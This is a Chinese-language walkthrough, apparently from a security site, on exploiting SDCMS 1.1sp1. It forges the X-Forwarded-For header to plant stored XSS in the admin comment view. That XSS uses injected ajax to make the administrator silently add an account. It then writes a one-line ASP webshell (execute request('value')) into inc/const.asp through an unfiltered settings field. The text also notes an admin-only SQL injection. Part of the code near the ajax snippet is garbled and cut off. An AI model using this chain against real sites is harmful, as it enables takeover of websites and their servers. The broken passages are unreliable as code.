SDCMS全称:时代网站信息管理系统。SDCMS是基于ASP+ACCESS/MSSQL的网站信息管理系统。永久免费,开源!SDCMS以信息为主题,通过以文字和图片标题为起点,以无限栏目分类为支撑,配合多项插件的灵活使用,以达到信息门户的远景! SDCMS总结各类信息门户的现状,充分考虑符合站长需求的前提下。设计了灵活多变的标签调用方式,满足了不同层次的需求。 SDCMS以安全第一为原则,解决了ASP程序的常见 漏洞 问题(服务器自身的问题除外)。程序自身无任何后门,严格的代码过滤功能为网站的安全运行提供了可靠的保障。 上面是SDCMS网站对自己产品的评价。确实,其产品漂亮的界面, 灵活的插件体现了这一点。尤其在安全方面, 在防注入方面过滤掉了相关的敏感符号,起到了一定的防护作用。 其安全性和外表的美观性,及其可扩展性, 使其成为了广大建站爱好者的不二之选. 我们google关键字]power by sdcms]便可以发现. 但智者千滤, 必有一失。一般在最平常,最让人忽略的地方,往往是最容易出问题的地方。(其官网为:http://HdhCmsTestsdcms.cn 大家可以在上面下到源代码) 看下面的代码,我们开始慢慢分析: (注: 这种方法是在管理员允许评论的时候,才能利用的,不过,一般管理员都会允许评论吧) 在/plug/comment.asp中 sub save_comment …… username=sdcms_f.HTMLEncode(username) content=sdcms_f.contentEncode(content) ip=sdcms_f.getip ‘请看这里,这里得到用户的IP. set rs=server.CreateObject("adodb.recordset") sql="select username,content,ip,infoid,ispass from sd_comment" rs.open sql,conn,1,3 rs.addnew rs(0)=left(username,10) rs(1)=content rs(2)=ip //没有任何过滤, 直接插到了 数据库 中. rs(3)=id if sdcms_comment_ispass=1 then msg_contents=",请等待审核" rs(4)=0 else rs(4)=1 end if rs.update …… end sub 下面我们看下getip的实现吧, 在/inc/function. asp 中 Public Function getip ip=request.ServerVariables("HTTP_X_FORWARDED_FOR") if ip="" then ip=Request.ServerVariables("REMOTE_ADDR") getip=ip End function 看到这里,大家都知道问题的存在了吧.作者通过]HTTP_X_FORWARDED_FOR]这个字段来得到IP的值,而我们知道,这个字段在数据包中是可以伪造的. 我们可以伪造数据包,将]HTTP_X_FORWARDED_FOR]的值, 改成一句话木马提交, 这样, 就直接将一句话木马插进数据库里去了. 如果我们知道数据库的位置,并且数据库的后缀名是asp的,那么就直接可以利用了. 但可惜,这个CMS的数据库的名称未知,在安装的时候, 由如下代码生成12个随机字符构成, 加上后缀名还是mdb的, 所以我们要插入一句话, 也没法利用的. /install/index.asp中 Function get_something Randomize Do While Len(pass)<12 '随机密码位数 num1=CStr(Chr((57-48)*rnd+48)) '0~9 num2=CStr(Chr((90-65)*rnd+65)) 'A~Z num3=CStr(Chr((122-97)*rnd+97)) 'a~z pass=pass&num1&num2&num3 loop get_something=pass end function 我们考虑用另外一种方式来达到入侵的目的. 看如下代码: /admin/sdcms_comment.asp sub main echo "<form name=""add"" action=""?"" method=""post"" onSubmit=""return confirm('确定要执行选定的操作吗?');"">" page=request.querystring("page") if page="" or not isnumeric(page) then page=1 end if pages =20 set rs=server.CreateObject("adodb.recordset") if request("classid")<>0 then tj=" where infoid="&request("classid")&"" ‘这里还有一个注入漏洞,虽然上面用classid=sdcms.Requestint(classid)来得到其整数值,但放在sql中查询的时候,并没有用classid来查询,而是直接用request([classid])来查询,作者在防注入的时候,没有对其值进行过滤, 所以可以注入, 但这个注入的前提是有管理员权限, 所以,我们就不讨论了. sql="select id,username," if Is_sql=0 then sql=sql&"(iif(ispass=1,'已审','未审'))" else HdhCmsTest2cto测试数据 sql=sql&"(case ispass when 1 then '已审'else'未审' end)" end if sql=sql&",ip,adddate,content,ispass,infoid from "&sd_table&" "&tj&" order by ispass,id desc" ‘作者用sql语句直接查出IP的值来,并用如下代码显示在了页面上,没有经过任何过滤. <td class="title_bg" style="text-align:left"><span style="float:right"><%if rs(6)=0 then%><a href="?action=pass&id=<%=rs(0)%>&t=1&classid=<%=classid%>">通过验证</a><%else%><a href="?action=pass&id=<%=rs(0)%>&t=0&classid=<%=classid%>">取消验证</a><%end if%> <a href="?action=del&id=<%=rs(0)%>&classid=<%=classid%>" ,false); ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); ajax.send("t0=test&t1=test&t2=1"); 这样,管理员浏览过评论后,就会自动添加一个帐号, 呵呵. 这在我以前的文章中都提到过, 就不细讲了. 接下来是如何拿shell. 我们看下后台写配置的地方的代码: 在/admin/sdcms_set.asp中 set fso=server.CreateObject("scripting.filesystemobject") set info=fso.CreateTextFile(Server.mappath("inc/const.asp"),true) info.write "<" & "%" & vbcrlf …… info.write "%" & ">" info.close set info=nothing set fso=nothing 作者将配置文件写到了/inc/const.asp中, 而在 sub save t0=clear_bad(trim(request("t0"))) t1=clear_bad(trim(request("t1"))) t2=clear_bad(trim(request("t2"))) t3=clear_bad(trim(request("t3"))) t4=clear_bad(trim(request("t4"))) t5=clear_bad(trim(request("t5"))) t6=clear_bad(trim(request("t6"))) t7=clear_bad(trim(request("t7"))) t8=clear_bad(trim(request("t8"))) t9=clear_bad(trim(request("t9"))) t10=clear_bad(trim(request("t10"))) t11=clear_bad(trim(request("t11"))) t12=clear_bad(trim(request("t12"))) t13=trim(request("t13")) t14=dir_check(trim(request("t14"))) t15=trim(request("t15")) t16=trim(request("t16")) t17=dir_check(trim(request("t17"))) if t17<>"" then t17=t17&"/" select case t3 case ".htm",". html ",".shtml" case else:t3=".html" end select select case t13 case "0","1" case else:t13=0 end select set sdcms_f=new sdcms_function t9=sdcms_f.check_event(t9,"|"):t10=sdcms_f.check_event(t10,"|"):t11=sdcms_f.check_event(t11,"|") set sdcms_f=nothing, 对其提交的参数进行了过滤. Function clear_bad(t0) clear_bad=Replace(t0,"""","") clear_bad=Replace(t0,CHR(10),"") End Function 上面可以看到对t15,t16的值没有过滤. T16正好是 系统 管理,偏好设置中的文件名称项 所以,我们将文件名称的值改为test"%><%execute request("value")%><%a="test 这样, 我们就在/inc/const.asp文件中,写入了一句话木马. 然后再上传大的webshell就OK了.
查看更多关于SDCMS 1.1sp1的XSS漏洞的挖掘与利用 - 网站安全 - 自的详细内容...